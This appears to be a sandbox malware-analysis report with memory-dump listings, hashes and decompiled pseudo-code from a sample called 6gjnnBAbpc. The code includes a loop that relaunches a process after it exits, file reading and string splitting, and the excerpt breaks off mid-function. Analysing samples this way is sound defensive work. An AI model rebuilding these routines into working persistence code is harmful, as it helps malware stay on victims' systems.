                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401c45
                                                                                                                                                                                                                                                                                                        0x00401c43
                                                                                                                                                                                                                                                                                                        0x00401c3c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401adc
                                                                                                                                                                                                                                                                                                        0x00401adf
                                                                                                                                                                                                                                                                                                        0x00401c18
                                                                                                                                                                                                                                                                                                        0x00401c20
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ae5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ae5
                                                                                                                                                                                                                                                                                                        0x00401adf
                                                                                                                                                                                                                                                                                                        0x00401ad6
                                                                                                                                                                                                                                                                                                        0x00401ab5
                                                                                                                                                                                                                                                                                                        0x00401ab8
                                                                                                                                                                                                                                                                                                        0x00401b5a
                                                                                                                                                                                                                                                                                                        0x00401b6b
                                                                                                                                                                                                                                                                                                        0x00401b70
                                                                                                                                                                                                                                                                                                        0x00401b78
                                                                                                                                                                                                                                                                                                        0x00401b7c
                                                                                                                                                                                                                                                                                                        0x00401b84
                                                                                                                                                                                                                                                                                                        0x00401b8f
                                                                                                                                                                                                                                                                                                        0x00401b97
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401aba
                                                                                                                                                                                                                                                                                                        0x00401abd
                                                                                                                                                                                                                                                                                                        0x00401cfb
                                                                                                                                                                                                                                                                                                        0x00401d29
                                                                                                                                                                                                                                                                                                        0x00401d29
                                                                                                                                                                                                                                                                                                        0x00401ac3
                                                                                                                                                                                                                                                                                                        0x00401d02
                                                                                                                                                                                                                                                                                                        0x00401d22
                                                                                                                                                                                                                                                                                                        0x00401d24
                                                                                                                                                                                                                                                                                                        0x00401abd
                                                                                                                                                                                                                                                                                                        0x00401ab8
                                                                                                                                                                                                                                                                                                        0x00401ab3
                                                                                                                                                                                                                                                                                                        0x00401d34

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateItemMessageSendWindow
                                                                                                                                                                                                                                                                                                        • String ID: 0$About...$EDIT$File Editor for Windows!Created using the Win32 API
                                                                                                                                                                                                                                                                                                        • API String ID: 2461998243-509482549
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8ec94040c610515bec2416d0adaa2c3baf4629c9f06ab549dac859a33765003e
                                                                                                                                                                                                                                                                                                        • Instruction ID: e85ddbd10a1709dc64db389d43dfdca03f0125780d47bd1fb79a5389fcfd3c42
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ec94040c610515bec2416d0adaa2c3baf4629c9f06ab549dac859a33765003e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A6118B0508304DFE710EF28D99875E7BE4EB44304F50892EE899DB3A1D379D9859B8B
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                        			E040077B0(void** _a4) {
                                                                                                                                                                                                                                                                                                        				void** _v8;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				void** _v28;
                                                                                                                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                                        					_v12 = 0x96;
                                                                                                                                                                                                                                                                                                        					_v16 = 0x1388;
                                                                                                                                                                                                                                                                                                        					_v8 = _a4;
                                                                                                                                                                                                                                                                                                        					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                                                        							_v24 = 0;
                                                                                                                                                                                                                                                                                                        							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                                                        							if(_t37 == 0) {
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                                                        									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                                                        									Sleep(0x7530);
                                                                                                                                                                                                                                                                                                        									_t40 = E04002070( *_v8);
                                                                                                                                                                                                                                                                                                        									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                                                        									_v8[3] = _t40;
                                                                                                                                                                                                                                                                                                        									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                                                        										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                                                        										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        											E04002510(_v8[3], 0x400e290);
                                                                                                                                                                                                                                                                                                        											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										goto L11;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                                        									L11:
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							break;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        						_v28 = _v8;
                                                                                                                                                                                                                                                                                                        						E040097C0(_v28);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                                                                        0x040077ba
                                                                                                                                                                                                                                                                                                        0x040077c2
                                                                                                                                                                                                                                                                                                        0x040077c8
                                                                                                                                                                                                                                                                                                        0x040077cf
                                                                                                                                                                                                                                                                                                        0x040077d9
                                                                                                                                                                                                                                                                                                        0x040077e2
                                                                                                                                                                                                                                                                                                        0x040077e8
                                                                                                                                                                                                                                                                                                        0x040077ef
                                                                                                                                                                                                                                                                                                        0x040077fc
                                                                                                                                                                                                                                                                                                        0x0400780e
                                                                                                                                                                                                                                                                                                        0x04007816
                                                                                                                                                                                                                                                                                                        0x04007818
                                                                                                                                                                                                                                                                                                        0x0400781f
                                                                                                                                                                                                                                                                                                        0x04007835
                                                                                                                                                                                                                                                                                                        0x04007840
                                                                                                                                                                                                                                                                                                        0x0400784c
                                                                                                                                                                                                                                                                                                        0x04007851
                                                                                                                                                                                                                                                                                                        0x04007857
                                                                                                                                                                                                                                                                                                        0x04007861
                                                                                                                                                                                                                                                                                                        0x0400786d
                                                                                                                                                                                                                                                                                                        0x04007879
                                                                                                                                                                                                                                                                                                        0x04007887
                                                                                                                                                                                                                                                                                                        0x0400788c
                                                                                                                                                                                                                                                                                                        0x0400788c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04007863
                                                                                                                                                                                                                                                                                                        0x04007821
                                                                                                                                                                                                                                                                                                        0x04007826
                                                                                                                                                                                                                                                                                                        0x0400788f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04007893
                                                                                                                                                                                                                                                                                                        0x0400781f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04007816
                                                                                                                                                                                                                                                                                                        0x040078a5
                                                                                                                                                                                                                                                                                                        0x040078ae
                                                                                                                                                                                                                                                                                                        0x040078b5
                                                                                                                                                                                                                                                                                                        0x040078ba
                                                                                                                                                                                                                                                                                                        0x040078bd
                                                                                                                                                                                                                                                                                                        0x040078bd
                                                                                                                                                                                                                                                                                                        0x040078c8

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 040077C2
                                                                                                                                                                                                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 0400780E
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001388), ref: 04007826
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00001388), ref: 04007835
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00007530), ref: 04007840
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 040078A5
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 040078BD
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                                                        • Instruction ID: 786529089a386be0191f5a1a0158813805cafbe076d78358bbe760b2cac44d20
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62318E74A00209EBFB54CF90C848BAEB7B1FB44305F14C668E905B7280D779BE40CB91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04005CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                                                        					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t29;
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                                                        						if(_v16 > 0) {
                                                                                                                                                                                                                                                                                                        							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        							_v20 = _t34;
                                                                                                                                                                                                                                                                                                        							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                                        								_v24 = 0;
                                                                                                                                                                                                                                                                                                        								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                                                        								if(_v24 == _v16) {
                                                                                                                                                                                                                                                                                                        									_v8 = E040016F0(_v20, _v16);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                                                                                                        0x04005cd6
                                                                                                                                                                                                                                                                                                        0x04005ce1
                                                                                                                                                                                                                                                                                                        0x04005d10
                                                                                                                                                                                                                                                                                                        0x04005d16
                                                                                                                                                                                                                                                                                                        0x04005d1d
                                                                                                                                                                                                                                                                                                        0x04005d2f
                                                                                                                                                                                                                                                                                                        0x04005d36
                                                                                                                                                                                                                                                                                                        0x04005d45
                                                                                                                                                                                                                                                                                                        0x04005d4b
                                                                                                                                                                                                                                                                                                        0x04005d52
                                                                                                                                                                                                                                                                                                        0x04005d54
                                                                                                                                                                                                                                                                                                        0x04005d6d
                                                                                                                                                                                                                                                                                                        0x04005d79
                                                                                                                                                                                                                                                                                                        0x04005d8b
                                                                                                                                                                                                                                                                                                        0x04005d8b
                                                                                                                                                                                                                                                                                                        0x04005d99
                                                                                                                                                                                                                                                                                                        0x04005d99
                                                                                                                                                                                                                                                                                                        0x04005d52
                                                                                                                                                                                                                                                                                                        0x04005da3
                                                                                                                                                                                                                                                                                                        0x04005da3
                                                                                                                                                                                                                                                                                                        0x04005d1d
                                                                                                                                                                                                                                                                                                        0x04005daf

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 443218420-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1c3b7df952a912c4f86c12ad70d9a091debb45511137cc5b62942badbf1a5776
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7021EC75A00208FBEB64DFA4DC49BAE77B5EB48705F108659F615BB2C0C778AA80CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: mallocmemmoverealloc
                                                                                                                                                                                                                                                                                                        • String ID: `'$p'
                                                                                                                                                                                                                                                                                                        • API String ID: 1823370115-286278047
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7709683076d90ca535b78cad08b96f01a0e0988889cd0d9cf5be07c8e64d2818
                                                                                                                                                                                                                                                                                                        • Instruction ID: e81dcd2bf55d7575d62e3bdedaa82d3939f2d228369639f389b0d43c20e4441b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7709683076d90ca535b78cad08b96f01a0e0988889cd0d9cf5be07c8e64d2818
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E11CF0704301EFD724AF15D64071ABBE0AB84744F90C83ED8859B792D7B9988ADB5A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04005B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                                                                                                                        				char* _v36;
                                                                                                                                                                                                                                                                                                        				char* _v40;
                                                                                                                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                                        					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                                                        					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                                                        					_v24 = 0;
                                                                                                                                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                                                        						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                                                                                                                                                        							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                                        							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                                                        					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t69;
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                                                        							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                                                        							if(_v40 != 0) {
                                                                                                                                                                                                                                                                                                        								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                                                        								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                                                        								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                                        								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        								 *_a12 = _v12;
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							break;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                                        							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        							if(_v44 != 0) {
                                                                                                                                                                                                                                                                                                        								E04007B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                                                        								 *_a16 = _v44;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                                                                        0x04005b56
                                                                                                                                                                                                                                                                                                        0x04005b61
                                                                                                                                                                                                                                                                                                        0x04005b85
                                                                                                                                                                                                                                                                                                        0x04005b92
                                                                                                                                                                                                                                                                                                        0x04005b95
                                                                                                                                                                                                                                                                                                        0x04005b9c
                                                                                                                                                                                                                                                                                                        0x04005ba3
                                                                                                                                                                                                                                                                                                        0x04005bbc
                                                                                                                                                                                                                                                                                                        0x04005bc3
                                                                                                                                                                                                                                                                                                        0x04005bcb
                                                                                                                                                                                                                                                                                                        0x04005bd7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04005bde
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04005bc3
                                                                                                                                                                                                                                                                                                        0x04005be6
                                                                                                                                                                                                                                                                                                        0x04005bf6
                                                                                                                                                                                                                                                                                                        0x04005bfc
                                                                                                                                                                                                                                                                                                        0x04005c03
                                                                                                                                                                                                                                                                                                        0x04005c09
                                                                                                                                                                                                                                                                                                        0x04005c10
                                                                                                                                                                                                                                                                                                        0x04005c17
                                                                                                                                                                                                                                                                                                        0x04005c30
                                                                                                                                                                                                                                                                                                        0x04005c37
                                                                                                                                                                                                                                                                                                        0x04005c59
                                                                                                                                                                                                                                                                                                        0x04005c68
                                                                                                                                                                                                                                                                                                        0x04005c71
                                                                                                                                                                                                                                                                                                        0x04005c7a
                                                                                                                                                                                                                                                                                                        0x04005c87
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04005c87
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04005c37
                                                                                                                                                                                                                                                                                                        0x04005c8f
                                                                                                                                                                                                                                                                                                        0x04005ca4
                                                                                                                                                                                                                                                                                                        0x04005cab
                                                                                                                                                                                                                                                                                                        0x04005cb9
                                                                                                                                                                                                                                                                                                        0x04005cc7
                                                                                                                                                                                                                                                                                                        0x04005cc7
                                                                                                                                                                                                                                                                                                        0x04005cab
                                                                                                                                                                                                                                                                                                        0x04005c8f
                                                                                                                                                                                                                                                                                                        0x04005c03
                                                                                                                                                                                                                                                                                                        0x04005ccf

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04005B7F
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 04005B8C
                                                                                                                                                                                                                                                                                                        • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005BB6
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005BF6
                                                                                                                                                                                                                                                                                                        • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005C2A
                                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04005C59
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005C9E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 808621155-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5a59fe48962482dc997a37d5c0ed7d0013e253906576cb4b19edba68c8a08fb2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D451C774904209EFEB04CF94C998BEEBBB5EF48305F148559E505B7284D379AA80CFA5
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04006CF0() {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                                                                                                                        				int _v24;
